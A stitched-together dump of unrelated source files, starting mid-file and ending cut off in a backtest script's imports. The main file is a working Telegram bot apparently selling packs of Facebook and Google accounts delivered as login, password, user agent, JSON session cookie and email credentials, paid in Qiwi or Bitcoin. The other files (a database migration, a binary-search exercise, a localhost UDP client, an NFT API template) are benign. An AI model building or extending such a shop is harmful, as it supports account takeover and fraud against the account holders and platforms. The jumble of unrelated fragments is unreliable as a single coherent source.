x+\"m/s\"\r\n\r\nclass Metr(metaclass=MathObject):\r\n def __str__(self, x) -> str:\r\n if x.replace(\".\", \"\").isdigit():\r\n x=float(x)\r\n if x<1 and 0.1= 1 and i <= quant and j2 == 1):\n global q\n q = int(text2)\n q = q * rub_sum\n keyboard = types.InlineKeyboardMarkup()\n payqiwi_button = types.InlineKeyboardButton(text=\"оплатить Qiwi\", callback_data=\"payqiwi\")\n paybtc_button = types.InlineKeyboardButton(text=\"оплатить Btc\", callback_data=\"paybtc\")\n mainmenu_button = types.InlineKeyboardButton(text=\"◀️ Главное меню\", callback_data=\"mainmenu\")\n keyboard.row(payqiwi_button, paybtc_button).row(mainmenu_button)\n st = str(\"Итого стоимость:\\n`{0}`руб\\n\\n_Выберите способ оплаты:_\".format(q))\n msg = bot.send_message(chat_id, text=st, reply_markup=keyboard, parse_mode='MarkdownV2')\n else:\n invalid_value(message)\n\n#read number of accounts\ndef read_quantity(id):\n msg = bot.forward_message(chat_id=constant.primary_chat_id, from_chat_id=constant.primary_chat_id, message_id=id)\n bot.delete_message(chat_id=constant.primary_chat_id, message_id=msg.message_id)\n return msg.text\n\n#next step handler, after input quantity fbru50\ndef pay_fbru50(message):\n pay(message, quant_fbru50, constant.fbru50_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity fbua50\ndef pay_fbua50(message):\n pay(message, quant_fbua50, constant.fbua50_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity fbgb250\ndef pay_fbgb250(message):\n pay(message, quant_fbgb250, constant.fbgb250_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity fbusa250\ndef pay_fbusa250(message):\n pay(message, quant_fbusa250, constant.fbusa250_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity ggworld\ndef pay_ggworld(message):\n pay(message, quant_ggworld, constant.ggworld_rub_sum, invalid_value_google)\n\n#next step handler, after input quantity ggeu\ndef pay_ggeu(message):\n pay(message, quant_ggeu, constant.ggeu_rub_sum, invalid_value_google)\n\n#next step handler, after input quantity ggusatop\ndef pay_ggusatop(message):\n pay(message, quant_ggusatop, constant.ggusatop_rub_sum, invalid_value_google)\n\n#read list of user IDs\ndef read_user_ids(id):\n msg = bot.forward_message(chat_id=constant.primary_chat_id, from_chat_id=constant.primary_chat_id, message_id=id)\n bot.delete_message(chat_id=constant.primary_chat_id, message_id=msg.message_id)\n return msg.text\n\n#add unique ID\ndef add_new_id(message):\n m = read_user_ids(constant.buyer_IDs)\n j = \"\"\n n = 0\n new_id = str(message.chat.id)\n for i in m:\n if (i != \",\"):\n j = j + i\n else:\n if (j == new_id):\n n = n + 1\n break\n j = \"\"\n if n == 0:\n m = m + new_id + \",\"\n bot.edit_message_text(text=m, chat_id=constant.primary_chat_id, message_id=6)\n\n#moscow time\ndef time():\n t1 = str(datetime.now() + timedelta(minutes=180))\n t2 = t1[-15:]\n t2 = t2[:5]\n tf = t2[:2]\n tl = t2[-2:]\n t1 = tf + \"\\:\" + tl\n return t1\n\n#moscow time +30m\ndef time210():\n t1 = str(datetime.now() + timedelta(minutes=210))\n t2 = t1[-15:]\n t2 = t2[:5]\n tf = t2[:2]\n tl = t2[-2:]\n t1 = tf + \"\\:\" + tl\n return t1\n\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n add_new_id(message)\n add_replykeyboard(message)\n mainmenu_inline(message)\n\n@bot.message_handler(content_types=['text'])\ndef handle_text(message):\n if message.text == '🔄 Начать сначала':\n mainmenu_inline(message)\n\n#inline keyboard\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n #return to main menu\n if call.data == \"mainmenu\":\n mainmenu_inline(call.message)\n\n #select type of accounts\n elif call.data == \"choose\":\n keyboard_choose = types.InlineKeyboardMarkup()\n facebook_button = types.InlineKeyboardButton(text=\"Facebook\", callback_data=\"facebook\")\n google_button = types.InlineKeyboardButton(text=\"Google\", callback_data=\"google\")\n mainmenu_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"mainmenu\")\n keyboard_choose.row(facebook_button, google_button).row(mainmenu_button)\n sst = str(\n \"Выберите тип аккаунтов:\")\n bot.send_message(call.message.chat.id, text=sst, reply_markup=keyboard_choose, parse_mode='MarkdownV2')\n\n #select facebook accounts\n elif call.data == \"facebook\":\n keyboard_facebook = types.InlineKeyboardMarkup(row_width=1)\n st_fbru50 = \"Facebook 🇷🇺RU50$ пак 10шт. = {0}руб\".format(constant.fbru50_rub_sum)\n st_fbua50 = \"Facebook 🇺🇦UA50$ пак 10шт. = {0}руб\".format(constant.fbua50_rub_sum)\n st_fbgb250 = \"Facebook 🇬🇧GB250$ пак 10шт. = {0}руб\".format(constant.fbgb250_rub_sum)\n st_fbusa250 = \"Facebook 🇺🇸USA250$ пак 10шт. = {0}руб\".format(constant.fbusa250_rub_sum)\n fbru50_button = types.InlineKeyboardButton(text=st_fbru50,\n callback_data=\"fbru50\")\n fbua50_button = types.InlineKeyboardButton(text=st_fbua50,\n callback_data=\" fbua50\")\n fbgb250_button = types.InlineKeyboardButton(text=st_fbgb250,\n callback_data=\"fbgb250\")\n fbusa250_button = types.InlineKeyboardButton(text=st_fbusa250,\n callback_data=\"fbusa250\")\n choose_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"choose\")\n keyboard_facebook.add(fbru50_button, fbua50_button, fbgb250_button, fbusa250_button, choose_button)\n st = str(\"Выберите аккаунты\\n\\n*Текстовый блок информации об аккаунтах\\n\\nlog:pass:useragent:{json_cookie}:mail:pass\")\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard_facebook)\n\n #select google accounts\n elif call.data == \"google\":\n keyboard_facebook = types.InlineKeyboardMarkup(row_width=1)\n st_ggworld = \"Google 🌏World пак 10шт. = {0}руб\".format(constant.ggworld_rub_sum)\n st_ggeu = \"Google 🇪🇺EU пак 10шт. = {0}руб\".format(constant.ggeu_rub_sum)\n st_ggusatop = \"Google 🇺🇸USA top пак 10шт. = {0}руб\".format(constant.ggusatop_rub_sum)\n ggworld_button = types.InlineKeyboardButton(text=st_ggworld, callback_data=\"ggworld\")\n ggeu_button = types.InlineKeyboardButton(text=st_ggeu, callback_data=\"ggeu\")\n ggusatop_button = types.InlineKeyboardButton(text=st_ggusatop,\n callback_data=\"ggusatop\")\n choose_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"choose\")\n keyboard_facebook.add(ggworld_button, ggeu_button, ggusatop_button, choose_button)\n st = str(\"Выберите аккаунты\\n\\n*Текстовый блок информации об аккаунтах\\n\\n*Описание особеноостей аккаунтов\")\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard_facebook)\n\n #payment qiwi\n elif call.data == \"payqiwi\":\n a = random.randint(1000000, 9999999)\n idname = call.message.chat.id\n #payment comment\n com = \"id:\" + str(idname) + \":\" + str(a)\n t180 = time()\n t210 = time210()\n qiw_url = str(\n \"https://qiwi.com/payment/form/99?extra['account']={0}&amountInteger={2}&amountFraction=0&extra['comment']={1}&blocked[0]=account&blocked[1]=sum&blocked[2]=comment\".format(\n constant.qiw_tel, com, q))\n qiw_keyboard = types.InlineKeyboardMarkup()\n qiw_pay_button = types.InlineKeyboardButton(text=\"Оплатить\", url=qiw_url)\n manager_button = types.InlineKeyboardButton(text='Менеджер', url=constant.support_name)\n qiw_back_button = types.InlineKeyboardButton(text=\"⏹ Отмена(Главное меню)\", callback_data=\"mainmenu\")\n qiw_keyboard.row(qiw_pay_button).row(manager_button).row(qiw_back_button)\n strqiwi = \"_\\-Меню оплаты\\-_\\n\\nПереведите `{3}`руб на Qiwi\\-кошелек:\\n`{1}`\\nукажите комментарий:\\n`{0}`\\n\" \\\n \"_Либо нажмите кнопу [Оплатить]({2}) \\(Данные будут заполнены автоматически\\)_ \\n\\n\".format(\n com, constant.qiw_tel, qiw_url, q)\n strqiwi2 = \"Оплатите в течении 30 минут\\nдо `{0}`по МСК\\ncейчас `{1}` по МСК\\n\\n_\\(После оплаты отпишите менеджеру, переслав это сообщение\\)_\".format(t210, t180)\n strqiwi3 = strqiwi + strqiwi2\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=strqiwi3,\n reply_markup=qiw_keyboard, parse_mode='MarkdownV2')\n\n #payment bitcoin\n elif call.data == \"paybtc\":\n #crypto exchange public api\n url = 'https://yobit.net/api/2/btc_rur/ticker'\n response = requests.get(url).json()\n #json response parse\n price = response['ticker']['sell']\n a = (1 / price) * q\n a = round(a, 8)\n text = str(a)\n t180 = time()\n t210 = time210()\n keyboard = types.InlineKeyboardMarkup()\n manager_button = types.InlineKeyboardButton(text='Менеджер', url=constant.support_name)\n btc_back_button = types.InlineKeyboardButton(text=\"⏹ Отмена(Главное меню)\", callback_data=\"mainmenu\")\n keyboard.row(manager_button).row(btc_back_button)\n st = \"_\\-Меню оплаты\\-_\\n\\nПереведите:`\\n{1}`btc\\nНа кошелек:\\n`{4}`\\n\\nСовершите платеж\" \\\n \" в течении 30 минут\\nдо `{2}`по МСК\\ncейчас `{3}` по МСК\\n\\nПосле пополнения отпишите [Менеджеру]({0}),\" \\\n \" переслав это сообщение\".format(\n constant.support_name, a, t210, t180, constant.btc_wlt)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard, parse_mode='MarkdownV2')\n\n elif call.data == \"info\":\n keyboard_personal = types.InlineKeyboardMarkup()\n mainmenu_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"mainmenu\")\n support_button = types.InlineKeyboardButton(text='Поддержка', url=constant.support_name)\n keyboard_personal.row(mainmenu_button, support_button)\n st = str(\"Информация об аккаунте {2} {3}\\n\\nID - {0}\\nusername - @{1}\".format(\n call.message.chat.id, call.message.chat.username, call.message.chat.first_name,\n call.message.chat.last_name))\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard_personal)\n\n\n elif call.data == \"faq\":\n st1 = \"Выберите _Аккаунты_\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st2 = \"Выберите нужную позицию\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st3 = \"Укажите количество\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st4 = \"Выберите _Пополнить Qiwi_ или _BTC_\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st5 = \"Выберите _Оплатить_, либо совершите перевод самостоятельно, указав в переводе комментарий\\. Для отмены выберите _Отменить оплату_\\.\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st6 = \"Пополните указанный Btc\\-кошелек, на указанную сумму\\.\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st7 = \"После проведения оплаты напишите менеджеру, переслав сообщение \\-Меню Оплаты\\-\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n try:\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img1, caption=st1, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img2, caption=st2, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img3, caption=st3, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img4, caption=st4, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img5, caption=st5, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img6, caption=st6, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img7, caption=st7, parse_mode='MarkdownV2')\n except Exception:\n pass\n mainmenu_inline(call.message)\n\n #input quantity of fbru50\n elif call.data == \"fbru50\":\n global quant_fbru50\n quant_fbru50 = read_quantity(constant.fbru50)\n st = \"_Facebook 🇷🇺RU50$ пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbru50, constant.fbru50_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbru50)\n\n #input quantity of fbua50\n elif call.data == \"fbua50\":\n global quant_fbua50\n quant_fbua50 = read_quantity(constant.fbua50)\n st = \"_Facebook 🇺🇦UA50$ пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbua50, constant.fbua50_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbua50)\n\n #input quantity of fbgb250\n elif call.data == \"fbgb250\":\n global quant_fbgb250\n quant_fbgb250 = read_quantity(constant.fbgb250)\n st = \"_Facebook 🇬🇧GB250$ пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbgb250, constant.fbgb250_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbgb250)\n\n #input quantity of fbusa250\n elif call.data == \"fbusa250\":\n global quant_fbusa250\n quant_fbusa250 = read_quantity(constant.fbusa250)\n st = \"_Facebook 🇺🇸USA250$ пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbusa250, constant.fbusa250_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbusa250)\n\n #input quantity of ggworld\n elif call.data == \"ggworld\":\n global quant_ggworld\n quant_ggworld = read_quantity(constant.ggworld)\n st = \"_Google 🌏World пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_ggworld, constant.ggworld_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_ggworld)\n\n #input quantity of ggeu\n elif call.data == \"ggeu\":\n global quant_ggeu\n quant_ggeu = read_quantity(constant.ggeu)\n st = \"_Google 🇪🇺EU пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_ggeu, constant.ggeu_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_ggeu)\n\n #input quantity of ggusatop\n elif call.data == \"ggusatop\":\n global quant_ggusatop\n quant_ggusatop = read_quantity(constant.ggusatop)\n st = \"_Google 🇺🇸USA пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_ggusatop, constant.ggusatop_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_ggusatop)\n\nbot.polling(none_stop=True, interval=0)","repo_name":"Galimovar/Account_store_bot-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24374,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"15179254527","text":"\"\"\"empty message\n\nRevision ID: 4e9ad19c3e2e\nRevises: 37875abb00c7\nCreate Date: 2019-04-28 12:47:22.223513\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4e9ad19c3e2e'\ndown_revision = '37875abb00c7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('attachments_votes',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('attachment_id', sa.Integer(), nullable=False),\n sa.Column('vote', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(['attachment_id'], ['attachments.id'], name='attachments_votes__attachment__fk', ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], name='attachments_votes__user__fk'),\n sa.PrimaryKeyConstraint('user_id', 'attachment_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('attachments_votes')\n # ### end Alembic commands ###\n","repo_name":"aimanow/sft","sub_path":"src/backend/database/migrations/versions/4e9ad19c3e2e_.py","file_name":"4e9ad19c3e2e_.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30844082238","text":"# 정수 배열 A 와 B가 있다. A는 총 n개의 서로 다른 양의 정수를 포함하고 B는 총 m개의 서로 다른 양의 정수를 포함한다.\n\n# A, B를 이용해서 길이가 n인 새로운 배열 C를 만들어보자.\n\n# C[i] 는 배열 B에 있는 값 중 A[i] 에 가장 가까운 값 (절대값 차이가 가장 작은 값)으로 정의 된다. \n# 만약 이 조건을 만족하는 값들이 여럿 있는 경우, 그 중 가장 크기가 작은 값으로 정의 된다.\n# 예를 들어 A = [20, 5, 14, 9] 그리고 B = [16, 8, 12] 라고 해보자.\n\n# C[1] = 16 이다 - 왜냐하면 B[1] = 16이 A[1] = 20에 가장 가깝기 때문이다.\n# C[2] = 8 이다 - 왜냐하면 B[2] = 8이 A[2] = 5에 가장 가깝기 때문이다.\n# C[3] = 12 이다 - 왜냐하면 B[1] = 16 와 B[3] = 12 모두 A[3] = 14에 가장 가깝지만, B[3]의 값이 더 작기 때문이다.\n# C[4] = 8이다.\n# 이 예제의 경우 C = [16, 8, 12, 8]으로 정의된다.\n\n# 두 배열 A와 B가 주어졌을 때, 새로운 배열 C를 계산하여 배열 C에 포함된 값들의 합을 구하는 프로그램을 작성하시오.\n\nimport sys\n\nT = int(sys.stdin.readline())\n\nfor _ in range(T):\n a,b = map(int,sys.stdin.readline().split())\n A = list(map(int,sys.stdin.readline().split()))\n B = list(map(int,sys.stdin.readline().split()))\n B.sort()\n ans = 0\n for i in A:\n num = i\n st = 0\n ed = b-1\n while True:\n if st >= ed:\n break\n mid = (st+ed)//2\n if B[mid] <= num:\n st = mid+1\n else:\n ed = mid\n if st != 0 and B[st] - num >= num - B[st-1]:\n ans += B[st-1]\n else:\n ans += B[st]\n print(ans)","repo_name":"kysuk05/BJO_algo","sub_path":"실버/BJO17124.py","file_name":"BJO17124.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24958986319","text":"## UDP Client\nimport socket\n\ntarget_host = \"127.0.0.1\"\ntarget_port = 9997\n\n# creates a socket object\n# AF_INET = indicates we’ll use a standard IPv4 address\n# SOCK_DGRAM = indicates that this will be a UDP client\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# sends data\nclient.sendto(b\"AAABBBCCC\",(target_host, target_port))\n\n# receives data\ndata, addr = client.recvfrom(4096)\n\nprint(data.decode())\nclient.close()","repo_name":"christinec-dev/Python_Clients","sub_path":"udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12130941143","text":"# [프로그래머스] 구명보트\nfrom collections import deque\ndef solution(people, limit):\n answer = 0\n # 가장 큰 놈을 먼저 넣는다.\n # 그 다음부터는 넣을 수 있는 놈 중 가장 큰놈을 넣는다.\n people.sort(reverse=True)\n que = (people)\n print(people)\n inBoat = []\n weight = 0\n while que != []:\n # 남은 놈들 curQue에 넣는다.\n curQue = list(que)\n # 2명만 탈 수 있다는 조건 나중에 봄.\n if len(inBoat)==2:\n answer += 1\n inBoat = []\n weight = 0\n for i in range(len(curQue)):\n flagAdd = False\n # 큰 놈 부터 본다.\n # 들어갈 수 있으면 넣고 break\n # 끝까지 봤는데 넣을 수 없으면 보트 출발.\n if weight + curQue[i] <= limit:\n # 들어갈 수 있으면 넣고 que에서 빼주고\n inBoat.append(curQue[i])\n weight += curQue[i]\n que.remove(curQue[i])\n flagAdd = True\n break\n if not flagAdd:\n answer += 1\n inBoat = []\n weight = 0\n print(answer + 1)\n return answer + 1\n\n\npeople = [40,40,50,60,70,120,130,140,240]\n\nlimit = 240\nsolution(people,limit)\n\n# 3명도 탈 수 있는 건 줄 알고 이렇게 짰다.\n# 하지만 2명까지만 탈 수 있음. 그래서 2명 조건을 추가한다해도 시간초과뜸\n","repo_name":"devgin23/masterCote","sub_path":"Programmers/savingBoat.py","file_name":"savingBoat.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"72783917631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 13:12:57 2019\n\n@author: Mithilesh\n\"\"\"\n\ndef cupcakes(n,arr):\n arr.sort(reverse=True)\n cal=0\n for j in range(n):\n cal+=(2**j)*arr[j]\n print(cal)\n\nn=int(input())\narr=list(map(int,input().split()))\ncupcakes(n,arr)","repo_name":"abhaykatheria/cp","sub_path":"HackerRank2/Cupcakes.py","file_name":"Cupcakes.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"25585202263","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Controller(nn.Module):\n def __init__(self, latents, actions):\n super().__init__()\n self.fc = nn.Linear(latents, actions)\n\n def forward(self, *param):\n inputs = torch.cat(param, dim=1)\n return F.softmax(self.fc(inputs), 1)\n","repo_name":"fuzihang/CSC2542Project","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44274528630","text":"import sys\nimport time\nfrom functools import wraps\n\nfrom app.logger import log\n\n\ndef time_measurement(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n response_size = sys.getsizeof(result.json())\n total_time = end_time - start_time\n log(\n log.INFO,\n \"Function [%s] %s took {%s} seconds and the json file is {%s} kb long\",\n func.__name__,\n kwargs,\n str(total_time)[:5],\n response_size / 8000,\n )\n return result\n\n return wrapper\n","repo_name":"Simple2B/TenKabel_be","sub_path":"app/utility/time_measurement.py","file_name":"time_measurement.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28953378080","text":"from .apis_common import api\nimport requests\nimport logging\n\n\napi_plugin = api('Template API')\napi_plugin.set_rooturl('https://myroute/')\n\n\ndef check_connection(timeout=10000):\n logging.info('testing connection to {}'.format(api_plugin.name))\n reponse = requests.get(api_plugin.rootUrl)\n if reponse.status_code == 200:\n return True\n else:\n return False\n\n\ndef set_nft_id(encoded_id):\n '''\n sets the extra url parameters need for the request\n logging.info('Setting NFT to search to {0}'.format(api_plugin.name + api_plugin.parameter))\n api_plugin.parameter = encoded_id\n '''\n\n\ndef get_raw():\n # This pulls te raw json fro the request no need to change\n logging.info('get raw data from {0}'.format(api_plugin.name + api_plugin.parameter))\n response = requests.get(api_plugin.rootUrl + api_plugin.parameter)\n if response.status_code == 200:\n return True, response.json()\n else:\n return False, None\n\n\ndef get_owner():\n try:\n status, raw_json = get_raw()\n if status is True:\n '''\n change how the json is parsed to recieve the encoded owner address ie XCH.......\n owner_data = raw_json['owner_address']\n return status, owner_data['encoded_id']\n '''\n else:\n logging.error('Unexpected responce from {0}'.format(api_plugin.name))\n return False, None\n\n except KeyError:\n logging.error('Data entries not found in responce from {0}'.format(api_plugin.name))\n return False, None\n","repo_name":"monkeyzoo-metaverse/token-gifting-system","sub_path":"token-gifting-system/nfttracking/apis/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"27213009943","text":"# -*-coding: utf-8 -*-\n# Python 3.6\n# Author:Zhang Haitao\n# Email:13163385579@163.com\n# TIME:2018-07-07 17:07\n# NAME:FT-main.py\n\n\n\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n# from backtest.backtest_func import trade_date, backtest, buy_stocks_price, \\\n# sell_stocks_price, close_price_backtest\nfrom config import DIR_BACKTEST\n\nsns.set_style('white', {'axes.linewidth': 1.0, 'axes.edgecolor': '.8'})\nimport warnings\n\nwarnings.filterwarnings('ignore', category=FutureWarning)\nfrom collections import OrderedDict\nimport statsmodels.api as sm\n# import pyfolio as pf\nimport alphalens as alen\n\nimport sys\n\n# sys.path.append('./lib/')\n# from backtest.backtest_func import *\nfrom backtest.plot_performance import 